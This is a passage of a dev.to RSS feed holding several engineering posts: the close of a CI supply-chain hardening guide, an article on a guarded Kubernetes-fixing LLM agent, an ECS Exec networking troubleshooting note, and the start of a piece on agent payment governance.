&lt;strong&gt;Cosign:&lt;/strong&gt; ecosystem-agnostic. Works on any container image and on generic blobs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;gitleaks:&lt;/strong&gt; stack-agnostic. Alternatives: &lt;code&gt;trufflehog&lt;/code&gt;, &lt;code&gt;detect-secrets&lt;/code&gt;, GitHub native push protection. Run several; they catch different things.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CodeQL:&lt;/strong&gt; native multi-language (JS/TS, Python, Java, Kotlin, Go, Ruby, C#, C/C++, Swift). Alternatives: Semgrep Pro (broadest), Snyk Code, SonarCloud, Veracode.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;minimumReleaseAge&lt;/code&gt;:&lt;/strong&gt; native in pnpm. Universal via Renovate (&lt;code&gt;minimumReleaseAge&lt;/code&gt; config) covers npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SBOM:&lt;/strong&gt; &lt;code&gt;syft&lt;/code&gt; is stack-agnostic. Per-stack: &lt;code&gt;cyclonedx-bom&lt;/code&gt; (Python), &lt;code&gt;cyclonedx-maven-plugin&lt;/code&gt; (Java), &lt;code&gt;cyclonedx-gomod&lt;/code&gt; (Go), &lt;code&gt;cargo cyclonedx&lt;/code&gt; (Rust), &lt;code&gt;bundler-cyclonedx&lt;/code&gt; (Ruby), &lt;code&gt;dotnet CycloneDX&lt;/code&gt; (.NET). Consume with &lt;strong&gt;Dependency-Track&lt;/strong&gt;; scan with &lt;strong&gt;Trivy&lt;/strong&gt; or &lt;strong&gt;Grype&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
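&lt;p&gt;For ecosystems without a native cooldown, the Renovate route mentioned above is one config block. A sketch of a &lt;code&gt;renovate.json&lt;/code&gt; (the &lt;code&gt;internalChecksFilter&lt;/code&gt; line is how Renovate holds back updates that fail the age check; verify against your Renovate version's docs):&lt;/p&gt;

```json
{
  "$schema": "https://docs.renovatebot.com/renovate-schema.json",
  "minimumReleaseAge": "3 days",
  "internalChecksFilter": "strict"
}
```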

&lt;p&gt;The boundary survives. The YAML changes.&lt;/p&gt;




&lt;h2&gt;
  
  
  Closing
&lt;/h2&gt;

&lt;p&gt;Last week a colleague's PR went red on &lt;code&gt;pinact --check --verify&lt;/code&gt; because they'd added &lt;code&gt;actions/checkout@v6&lt;/code&gt; instead of the SHA. Thirty seconds of annoyance. Without that gate, that line would have been one tag-rewrite away from &lt;code&gt;tj-actions&lt;/code&gt;. Repeat across 110 &lt;code&gt;uses:&lt;/code&gt; lines, 16 workflows, 7 production Dockerfiles, and one &lt;code&gt;_.template&lt;/code&gt; CVE that turned out not to matter, and that's the week.&lt;/p&gt;

&lt;p&gt;The supply-chain attacker's leverage is asymmetric: one compromised maintainer, one rewritten tag, one unscanned dependency cascades into thousands of victims. The defender's leverage can be asymmetric too, but only if your controls live at the right boundary. SAST won't catch a malicious GitHub Action. A pen-test won't catch a tag rewrite. A bug bounty isn't going to surface an &lt;code&gt;_.template&lt;/code&gt; CVE buried four levels deep in a transitive dep nobody knew was there.&lt;/p&gt;

&lt;p&gt;The four-line diff at the top of this article wasn't found by SAST. It wasn't found by pen-test. It was found by a grep for &lt;code&gt;${{ github.event&lt;/code&gt; across every workflow in the monorepo, on a Tuesday, by someone who knew that string was the boundary between "code we wrote" and "code an attacker wrote for us."&lt;/p&gt;

&lt;p&gt;That grep took eleven seconds. The fix took four lines. The control that catches the next one took one commit.&lt;/p&gt;

&lt;p&gt;If you only take three things from this: pin every external CI reference (Action / include / plugin / orb / shared-library) to a content-addressed identifier; scope every CI permission block to least privilege; set a &lt;code&gt;minimumReleaseAge&lt;/code&gt; of at least 3 days on your package manager. Put the first two as required status checks on &lt;code&gt;main&lt;/code&gt;. Together they would have stopped &lt;code&gt;axios@1.14.1&lt;/code&gt; cold for any pipeline running them, and tj-actions cold for every repo that ran it. The other nine boundaries are the layers behind that.&lt;/p&gt;

&lt;p&gt;For a regulated workload (healthcare staffing, where downtime maps to nurses missing shifts at hospitals, so we weight availability higher than most SaaS), the calibration looks like this: we tolerated +5 minutes of PR latency, but rejected anything that could block a hotfix at 2am. Your domain's calibration will differ. Write down why.&lt;/p&gt;

&lt;p&gt;If you've calibrated &lt;code&gt;minimumReleaseAge&lt;/code&gt; differently, I want to hear the number and why, especially if you're in fintech or healthcare with stricter patch SLAs. Tell me I'm wrong about any of the trade-offs in the comments. I'd rather argue about the number here than discover the right answer at 2am during a credential-rotation drill because some maintainer's npm token leaked at lunch.&lt;/p&gt;




&lt;h2&gt;
  
  
  Appendix: minimal viable starter pack
&lt;/h2&gt;

&lt;p&gt;A team that has none of these in place can ship a meaningful subset in roughly a week, regardless of stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Lock manifests committed; CI install command refuses to mutate them.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;minimumReleaseAge&lt;/code&gt; (pnpm) or Renovate equivalent set to ≥ 3 days.&lt;/li&gt;
&lt;li&gt;Lifecycle-script default-deny: &lt;code&gt;pnpm.onlyBuiltDependencies&lt;/code&gt; allowlist + &lt;code&gt;--ignore-scripts&lt;/code&gt; in CI; equivalent gate per stack.&lt;/li&gt;
&lt;li&gt;Base images pinned by &lt;code&gt;@sha256:&lt;/code&gt; digest. Non-root &lt;code&gt;USER&lt;/code&gt; in every production image.&lt;/li&gt;
&lt;li&gt;Workflow / pipeline default-deny on permissions; per-job grants.&lt;/li&gt;
&lt;li&gt;Mutable references (&lt;code&gt;uses:&lt;/code&gt;, &lt;code&gt;include:&lt;/code&gt;, plugins, orbs, shared libs) pinned to commit SHAs; CI gate fails un-pinned PRs.&lt;/li&gt;
&lt;li&gt;Untrusted CI input passed via env vars, never interpolated into shell.&lt;/li&gt;
&lt;li&gt;Image signing via cosign + Sigstore (or stack-equivalent provenance).&lt;/li&gt;
&lt;li&gt;PR-time secret scanning (gitleaks / trufflehog).&lt;/li&gt;
&lt;li&gt;PR-time dependency CVE gate (&lt;code&gt;pnpm audit&lt;/code&gt; + per-stack equivalents above) with documented expiry-forced allowlist.&lt;/li&gt;
&lt;li&gt;Logger redaction at framework level for auth headers, cookies, password / token / secret keys.&lt;/li&gt;
&lt;li&gt;CODEOWNERS covering every file in this list.&lt;/li&gt;
&lt;/ul&gt;
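&lt;p&gt;To make one of those items concrete, here is how the PR-time secret-scanning gate might look as a GitHub Actions job, following the same SHA-pinning and least-privilege rules as everything else (SHAs are placeholders; &lt;code&gt;gitleaks/gitleaks-action&lt;/code&gt; is the scanner named above):&lt;/p&gt;

```yaml
secret-scan:
  runs-on: ubuntu-latest
  permissions:
    contents: read
  steps:
    - uses: actions/checkout@<full-commit-sha> # vX
      with:
        fetch-depth: 0   # gitleaks scans commit history, not just the tip
    - uses: gitleaks/gitleaks-action@<full-commit-sha> # vX
```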

&lt;p&gt;Each item is a few lines of configuration. Total cost is roughly the week described above for a multi-project monorepo; smaller repos, proportionally less. The benefit, in our case, was being able to stop checking my phone on Sundays.&lt;/p&gt;

</description>
      <category>security</category>
      <category>devsecops</category>
      <category>githubactions</category>
      <category>supplychain</category>
    </item>
    <item>
      <title>How I Built an Autonomous SRE (and made it into the OpenAI Cookbook!)</title>
      <dc:creator>Zaynul Abedin Miah</dc:creator>
      <pubDate>Fri, 08 May 2026 11:46:40 +0000</pubDate>
      <link>https://dev.to/aws-builders/how-i-built-an-autonomous-sre-and-made-it-into-the-openai-cookbook-1pn2</link>
      <guid>https://dev.to/aws-builders/how-i-built-an-autonomous-sre-and-made-it-into-the-openai-cookbook-1pn2</guid>
      <description>&lt;h1&gt;
  
  
  Taming GPT-4o for Production EKS
&lt;/h1&gt;

&lt;p&gt;Let’s be brutally honest for a second: the idea of letting an LLM blindly run &lt;code&gt;kubectl apply&lt;/code&gt; on your production AWS EKS cluster is terrifying.&lt;/p&gt;

&lt;p&gt;It is the stuff of late-night DevOps nightmares. One rogue hallucination, an accidental namespace change, or a sudden &lt;code&gt;ClusterRoleBinding&lt;/code&gt; injection, and your entire infrastructure could be compromised.&lt;/p&gt;

&lt;p&gt;As an AWS Community Builder and AWS Student Builder Group Leader managing developer ecosystems in the Global South, I see developers rushing to integrate GenAI into their pipelines every day. But zero-shot LLM generation for live infrastructure isn't just risky; it's mathematically unsafe.&lt;/p&gt;

&lt;p&gt;I call this the &lt;strong&gt;"Infrastructure Hallucination"&lt;/strong&gt; problem.&lt;/p&gt;

&lt;p&gt;To solve this, I built &lt;strong&gt;Kube-AutoFix&lt;/strong&gt;: an autonomous Kubernetes debugging agent that acts as a Staff-Level SRE. It doesn’t just guess; it deploys, monitors, debugs, and mathematically validates its fixes. The architecture proved so resilient that it successfully passed a grueling security review by the OpenAI Codex bot and was officially merged into the &lt;strong&gt;&lt;a href="https://github.com/openai/openai-cookbook/pull/2659" rel="noopener noreferrer"&gt;OpenAI Cookbook&lt;/a&gt;&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Here is exactly how I built it, and the guardrails you need to start building safe agentic workflows. &lt;/p&gt;




&lt;h2&gt;
  
  
  The 'Infrastructure Hallucination' Problem
&lt;/h2&gt;

&lt;p&gt;When standard LLMs attempt Infrastructure as Code (IaC), they fail gracefully: the output looks plausible, which is the most dangerous kind of failure.&lt;/p&gt;

&lt;p&gt;They will confidently generate YAML that &lt;em&gt;looks&lt;/em&gt; perfect but contains fatal flaws:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Syntax Hallucinations:&lt;/strong&gt; Adding random markdown fences (&lt;code&gt;```yaml&lt;/code&gt;) inside the execution pipeline.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scope Creep:&lt;/strong&gt; Deciding your deployment needs a new &lt;code&gt;ServiceAccount&lt;/code&gt; with elevated privileges just because it saw a similar pattern in its training data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destructive State Changes:&lt;/strong&gt; Modifying core invariants like the &lt;code&gt;Namespace&lt;/code&gt; or overriding &lt;code&gt;Replica&lt;/code&gt; counts during a hotfix.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You cannot pipe probabilistic text generation directly into a deterministic system like AWS EKS without a strict translation layer.&lt;/p&gt;




&lt;h2&gt;
  
  
  Enter Kube-AutoFix &amp;amp; Structured Outputs
&lt;/h2&gt;

&lt;p&gt;To bridge this gap, I designed a closed-loop Agentic Workflow: &lt;strong&gt;Deploy ➡️ Monitor ➡️ Debug ➡️ Fix.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The Tech Stack:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Python 3.11&lt;/strong&gt; (The glue)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Python Client&lt;/strong&gt; (For raw cluster interaction)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS EKS&lt;/strong&gt; (Amazon Elastic Kubernetes Service for testing)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI SDK (GPT-4o)&lt;/strong&gt; (The reasoning engine)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pydantic&lt;/strong&gt; (The ultimate gatekeeper)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The secret sauce here is &lt;strong&gt;OpenAI’s Structured Outputs&lt;/strong&gt;. By wrapping our expected YAML fix in a Pydantic schema, we force GPT-4o to adhere to a strict JSON schema at the API level. It stops acting like a creative writer and starts acting like a deterministic function.&lt;/p&gt;
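&lt;p&gt;The pattern, stripped to its core: define the exact shape you will accept, and reject everything else before it reaches the cluster. A stdlib-only sketch of that shape check (the field names here are hypothetical; the real project expresses this as a Pydantic model handed to the OpenAI SDK's Structured Outputs):&lt;/p&gt;

```python
import json

# Hypothetical shape of a fix the agent will accept from the model.
EXPECTED_FIELDS = {"diagnosis": str, "fixed_yaml": str, "confidence": float}

def parse_fix(raw: str) -> dict:
    """Parse the model's JSON reply and enforce the expected schema.

    Missing keys, extra keys, or wrong types reject the whole payload.
    """
    data = json.loads(raw)
    if set(data) != set(EXPECTED_FIELDS):
        raise ValueError(f"unexpected fields: {sorted(set(data) ^ set(EXPECTED_FIELDS))}")
    for key, typ in EXPECTED_FIELDS.items():
        if not isinstance(data[key], typ):
            raise ValueError(f"{key} must be {typ.__name__}")
    return data

reply = '{"diagnosis": "bad image tag", "fixed_yaml": "kind: Deployment", "confidence": 0.9}'
fix = parse_fix(reply)
print(fix["diagnosis"])  # bad image tag
```

&lt;p&gt;With Structured Outputs the API enforces this schema during generation, so the model physically cannot return a differently shaped reply; the local check remains as defense in depth.&lt;/p&gt;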

&lt;p&gt;But even Structured Outputs aren't enough for a production cluster. We need guardrails.&lt;/p&gt;




&lt;h2&gt;
  
  
  Building the Ultimate Guardrails (Surviving the OpenAI Code Review)
&lt;/h2&gt;

&lt;p&gt;Getting a PR merged into the official OpenAI Cookbook is no walk in the park. The automated Staff-Level CI/CD review by the OpenAI Codex bot is unforgiving when it comes to system security.&lt;/p&gt;

&lt;p&gt;To pass the review, I had to architect three massive guardrails into Kube-AutoFix:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Mathematical YAML Validation
&lt;/h3&gt;

&lt;p&gt;LLMs love to wrap code in markdown fences (&lt;code&gt;```yaml&lt;/code&gt;). If you pass that to &lt;code&gt;kubectl&lt;/code&gt;, it crashes. Kube-AutoFix intercepts the LLM's response, strips any hallucinated markdown formatting using regex, and strictly parses the string through &lt;code&gt;yaml.safe_load_all()&lt;/code&gt;. If it isn't valid, parseable YAML, it never touches the cluster.&lt;/p&gt;
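&lt;p&gt;The fence-stripping step can be sketched with the stdlib alone (the regex is illustrative, not the project's exact pattern; the parse that follows would use &lt;code&gt;yaml.safe_load_all()&lt;/code&gt;):&lt;/p&gt;

```python
import re

# Match an opening fence like "```yaml" at a line start, or a closing
# fence at the end of the reply, and delete both before parsing.
FENCE_RE = re.compile(r"^```[\w-]*\n|\n?```$", re.MULTILINE)

def strip_markdown_fences(reply: str) -> str:
    """Remove hallucinated markdown fences around a YAML manifest."""
    return FENCE_RE.sub("", reply).strip()

raw = "```yaml\napiVersion: apps/v1\nkind: Deployment\n```"
print(strip_markdown_fences(raw))
```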

&lt;h3&gt;
  
  
  2. Deny-by-Default Architecture
&lt;/h3&gt;

&lt;p&gt;Kube-AutoFix operates on a strict "Zero Trust" model. Before applying a fix, the agent parses the &lt;code&gt;kind&lt;/code&gt; of Kubernetes resource the LLM is trying to deploy. If the LLM tries to sneak in a &lt;code&gt;Role&lt;/code&gt;, &lt;code&gt;ClusterRoleBinding&lt;/code&gt;, or &lt;code&gt;DaemonSet&lt;/code&gt; when it was only authorized to fix a &lt;code&gt;Deployment&lt;/code&gt;, the agent immediately rejects the payload.&lt;/p&gt;
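&lt;p&gt;A simplified sketch of that deny-by-default check (kind extraction is reduced to a line scan for illustration; the real agent parses the YAML documents):&lt;/p&gt;

```python
# The agent's authorization for this incident: fix a Deployment, nothing more.
ALLOWED_KINDS = {"Deployment"}

def extract_kinds(manifest: str) -> set[str]:
    """Collect every 'kind:' declared in the generated manifest."""
    return {
        line.split(":", 1)[1].strip()
        for line in manifest.splitlines()
        if line.startswith("kind:")
    }

def authorize(manifest: str) -> bool:
    """Reject the whole payload unless every kind is on the allowlist."""
    kinds = extract_kinds(manifest)
    return bool(kinds) and kinds <= ALLOWED_KINDS

print(authorize("kind: Deployment\nreplicas: 3"))               # True
print(authorize("kind: ClusterRoleBinding\nkind: Deployment"))  # False
```

&lt;p&gt;Note the whole payload is rejected, not just the offending document: a model that smuggles one extra resource in loses the entire fix.&lt;/p&gt;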

&lt;h3&gt;
  
  
  3. Strict Structural Invariants
&lt;/h3&gt;

&lt;p&gt;This was the final boss of the security review. How do you ensure the LLM fixes a crashing pod without altering the architecture? You lock the state. Kube-AutoFix extracts the original &lt;code&gt;Namespace&lt;/code&gt;, &lt;code&gt;Replica&lt;/code&gt; count, &lt;code&gt;Deployment Name&lt;/code&gt;, and &lt;code&gt;Container Ports&lt;/code&gt; from the failing cluster state and forces them onto the LLM's generated YAML. Even if GPT-4o hallucinates a scale-up to 50 replicas, Kube-AutoFix overrides it back to the original count before execution.&lt;/p&gt;
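&lt;p&gt;The invariant-locking merge looks roughly like this (field paths follow the Kubernetes Deployment schema; the merge itself is a simplified sketch of the idea, not the project's code):&lt;/p&gt;

```python
import copy

def enforce_invariants(generated: dict, original: dict) -> dict:
    """Force the original namespace, name, and replica count onto the
    model-generated manifest before it is ever applied."""
    fixed = copy.deepcopy(generated)
    fixed.setdefault("metadata", {})
    fixed["metadata"]["namespace"] = original["metadata"]["namespace"]
    fixed["metadata"]["name"] = original["metadata"]["name"]
    fixed.setdefault("spec", {})
    fixed["spec"]["replicas"] = original["spec"]["replicas"]
    return fixed

original = {"metadata": {"namespace": "prod", "name": "api"}, "spec": {"replicas": 3}}
hallucinated = {"metadata": {"namespace": "default", "name": "api"}, "spec": {"replicas": 50}}
print(enforce_invariants(hallucinated, original)["spec"]["replicas"])  # 3
```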




&lt;h2&gt;
  
  
  ☁️ Why This Matters for AWS Builders
&lt;/h2&gt;

&lt;p&gt;As an AWS Community Builder, I look at this pattern and see the future of cloud engineering.&lt;/p&gt;

&lt;p&gt;The concepts driving Kube-AutoFix aren't limited to EKS and Kubernetes. This exact closed-loop, deterministic agentic pattern can (and should) be applied across the AWS ecosystem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Amazon Bedrock:&lt;/strong&gt; Wrapping your custom Foundation Models in Pydantic to generate safe, deployable &lt;strong&gt;AWS CloudFormation&lt;/strong&gt; templates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS CDK:&lt;/strong&gt; Using agents to debug failing CDK synthesizer states and propose structurally validated TypeScript fixes.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automated Incident Response:&lt;/strong&gt; Hooking an agentic workflow into Amazon CloudWatch alarms to autonomously remediate CPU throttling without human intervention.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We are moving away from "AI that writes code" to "AI that safely operates infrastructure."&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Seeing &lt;strong&gt;&lt;a href="https://github.com/openai/openai-cookbook/pull/2659" rel="noopener noreferrer"&gt;Kube-AutoFix PR reviewed into the OpenAI Cookbook&lt;/a&gt;&lt;/strong&gt; was a massive milestone. It proves that with the right guardrails, we can trust AI with the keys to our infrastructure without losing sleep.&lt;/p&gt;

&lt;p&gt;If you are a DevOps fanatic, or just curious about Agentic AI, I'd love for you to dig into the code!&lt;/p&gt;

&lt;p&gt;🔗 &lt;strong&gt;Check out the source code here:&lt;/strong&gt; &lt;a href="https://github.com/azaynul10/kube-autofix" rel="noopener noreferrer"&gt;Kube-AutoFix on GitHub&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Let’s discuss in the comments:&lt;/strong&gt; How are you currently integrating AI into your CI/CD or infrastructure pipelines? Are you using agents, or sticking strictly to code-generation assistants? Let me know! 👇&lt;/p&gt;

</description>
      <category>aws</category>
      <category>devops</category>
      <category>kubernetes</category>
      <category>openai</category>
    </item>
    <item>
      <title>Why ECS Exec Fails on ECS Managed Instance and How to Fix It</title>
      <dc:creator>Kosuke Ozawa</dc:creator>
      <pubDate>Fri, 08 May 2026 05:19:16 +0000</pubDate>
      <link>https://dev.to/aws-builders/why-ecs-exec-fails-on-ecs-managed-instance-and-how-to-fix-it-3khg</link>
      <guid>https://dev.to/aws-builders/why-ecs-exec-fails-on-ecs-managed-instance-and-how-to-fix-it-3khg</guid>
      <description>&lt;p&gt;I hit an issue while testing ECS Managed Instance, so here's a quick note for future reference.&lt;/p&gt;

&lt;h2&gt;
  
  
  ECS Exec Fails on a Task Container Running on ECS Managed Instance in a Public Subnet
&lt;/h2&gt;

&lt;p&gt;If you deploy this setup in a public subnet without any special network configuration and run the Exec command, you'll get the following error:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;An error occurred &lt;span class="o"&gt;(&lt;/span&gt;TargetNotConnectedException&lt;span class="o"&gt;)&lt;/span&gt; when calling the ExecuteCommand operation: The execute &lt;span class="nb"&gt;command &lt;/span&gt;failed. TargetNotConnected: ecs:ecs-task_xxxxxxxxxxxxxxxx is not connected.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Network Considerations for ECS Managed Instance
&lt;/h2&gt;

&lt;p&gt;The blog post linked below covers this in detail, but it appears that with ECS Managed Instance, you cannot assign a public IP to a task using &lt;code&gt;assignPublicIp=ENABLED&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://zenn.dev/gsk9999/articles/0da047d2cc3b59" rel="noopener noreferrer"&gt;https://zenn.dev/gsk9999/articles/0da047d2cc3b59&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  When Task Instances Are Placed in a Public Subnet
&lt;/h2&gt;

&lt;p&gt;Here is what you can do:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Create a VPC Endpoint&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh3kwmzenvmbb2fiba8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh3kwmzenvmbb2fiba8.png" alt="Connect to Session Manager via VPC Endpoint" width="800" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I confirmed this works with my own testing. However, for production use, the &lt;strong&gt;per-hour cost of VPC Endpoints&lt;/strong&gt; is something to keep in mind.&lt;/p&gt;
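&lt;p&gt;ECS Exec rides on SSM Session Manager, so the interface endpoint to create is &lt;code&gt;ssmmessages&lt;/code&gt;. A CLI sketch (the region and all resource IDs are placeholders; check the ECS Exec documentation for your setup's exact requirements):&lt;/p&gt;

```shell
aws ec2 create-vpc-endpoint \
  --vpc-id vpc-xxxxxxxx \
  --vpc-endpoint-type Interface \
  --service-name com.amazonaws.ap-northeast-1.ssmmessages \
  --subnet-ids subnet-xxxxxxxx \
  --security-group-ids sg-xxxxxxxx \
  --private-dns-enabled
```

&lt;p&gt;The security group must allow HTTPS (443) from the task ENIs for the endpoint to be reachable.&lt;/p&gt;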

&lt;h2&gt;
  
  
  When Task Instances Are Placed in a Private Subnet
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;The method above&lt;/li&gt;
&lt;li&gt;Or route traffic to the internet via NAT Gateway&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc30svdu3dgrwxazl3ku.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmc30svdu3dgrwxazl3ku.png" alt="Connect to Session Manager via NAT Gateway" width="800" height="301"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I haven't tested this myself, but since the route is established at the network level in this case, it should work in theory.&lt;/p&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;When using ECS Managed Instance, it's important to pay attention to networking.&lt;/p&gt;

&lt;p&gt;This article doesn't go into detail on this, but the examples above assume &lt;code&gt;awsvpc&lt;/code&gt; mode. Depending on your use case, switching the ECS network mode to &lt;code&gt;bridge&lt;/code&gt; may also be an option.&lt;/p&gt;

&lt;p&gt;For production environments where NAT Gateway or VPC Endpoints are already in place, going with the approach described in the linked blog post is probably the better choice. Note that the linked blog post is written in Japanese.&lt;/p&gt;

</description>
      <category>aws</category>
      <category>containers</category>
      <category>cloud</category>
      <category>networking</category>
    </item>
    <item>
      <title>Agents that pay: why agent payments without governance is the next incident</title>
      <dc:creator>Alexey Vidanov</dc:creator>
      <pubDate>Fri, 08 May 2026 04:40:14 +0000</pubDate>
      <link>https://dev.to/aws-builders/agents-that-pay-why-agent-payments-without-governance-is-the-next-incident-2gc1</link>
      <guid>https://dev.to/aws-builders/agents-that-pay-why-agent-payments-without-governance-is-the-next-incident-2gc1</guid>
      <description>&lt;p&gt;The preview supports &lt;a href="https://docs.cdp.coinbase.com/" rel="noopener noreferrer"&gt;Coinbase CDP wallets&lt;/a&gt; and &lt;a href="https://privy.io/" rel="noopener noreferrer"&gt;Stripe Privy wallets&lt;/a&gt; as payment connections, using the &lt;a href="https://www.x402.org/" rel="noopener noreferrer"&gt;x402 protocol&lt;/a&gt; for HTTP-native stablecoin micropayments. Available in US East (N. Virginia), US West (Oregon), Europe (Frankfurt), and Asia Pacific (Sydney). &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi7opkq8bykpkzmdgmbgh.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi7opkq8bykpkzmdgmbgh.jpg" alt=" " width="800" height="519"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;End users fund wallets through stablecoin or fiat via debit card, and must explicitly authorize agent wallet access before the agent can transact at all. &lt;/p&gt;

&lt;p&gt;That's initial authorization, not per-action governance. The agent still decides what to do with that access at runtime.&lt;/p&gt;

&lt;p&gt;That's the plumbing. It works. Here's what it doesn't cover.&lt;/p&gt;

&lt;h2&gt;
  
  
  Four gaps in agent payment governance
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Gap 1: When is the agent allowed to pay?
&lt;/h3&gt;

&lt;p&gt;AgentCore enforces per-session spending limits. But a spending limit is a ceiling, not a policy. There's no lifecycle enforcement that prevents an agent from paying during exploration, before it's decided what to do with the data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; An agent exploring data sources pays $0.02 each to five different paid endpoints during its research phase. It doesn't yet know which source it needs. Three of those calls turn out to be irrelevant. The agent paid $0.06 for data it never used, and it hadn't even formed a plan yet. Nothing in the spending-limit model distinguishes "exploring options with someone else's money" from "executing a committed decision."&lt;/p&gt;

&lt;p&gt;Even if AgentCore handles retry and rate limiting at the transport layer, a governance gap lives above transport: the agent chose to spend before it decided what to build. That's not a retry problem. That's a phase problem.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;phases&lt;/strong&gt;. The agent can't call payment tools until it's finished reading and has committed to a plan. Not "shouldn't." Cannot. An exception fires.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;EXPLORE ──→ DECIDE ──→ COMMIT
(read only)  (propose)  (pay + act)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
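&lt;p&gt;A minimal sketch of such a guard in plain Python. The class, the &lt;code&gt;PhaseError&lt;/code&gt; name, and the tool names are illustrative, not an AgentCore API:&lt;/p&gt;

```python
class PhaseError(Exception):
    """Raised when a tool is called in a phase that forbids it."""

PAYMENT_TOOLS = {"pay_for_data", "pay_for_compute"}

class Agent:
    def __init__(self):
        self.phase = "EXPLORE"  # EXPLORE, DECIDE, COMMIT

    def advance(self, phase):
        order = ["EXPLORE", "DECIDE", "COMMIT"]
        # only single forward transitions are allowed
        if order.index(phase) != order.index(self.phase) + 1:
            raise PhaseError(f"cannot jump from {self.phase} to {phase}")
        self.phase = phase

    def call(self, tool, **kwargs):
        # hard rule: payment tools are rejected outside COMMIT
        if tool in PAYMENT_TOOLS and self.phase != "COMMIT":
            raise PhaseError(f"{tool} requires COMMIT, phase is {self.phase}")
        return f"{tool} executed"
```

&lt;p&gt;The point is that the rejection is an exception in the tool-calling loop, not a suggestion in the prompt.&lt;/p&gt;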



&lt;h3&gt;
  
  
  Gap 2: What happens when a multi-step workflow fails after money moved?
&lt;/h3&gt;

&lt;p&gt;Payments are irreversible. If an agent pays for data in step 1 and step 2 (analysis) then fails, the user has paid for nothing. The report never arrives. No compensation mechanism exists at the orchestration layer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The scenario:&lt;/strong&gt; Pay for market data, analyze it, send report. Model timeout on step 2. Payment already executed. Report never generated. User charged $0.05 for zero value.&lt;/p&gt;

&lt;p&gt;What's needed: &lt;strong&gt;transactions with compensation&lt;/strong&gt;. If step 2 fails, step 1's compensation fires (refund, credit, or at minimum a structured record that the payment delivered no value). Temporal and Inngest solve durable execution for workflows, but they're not integrated into the agent tool-calling loop where payment decisions happen.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
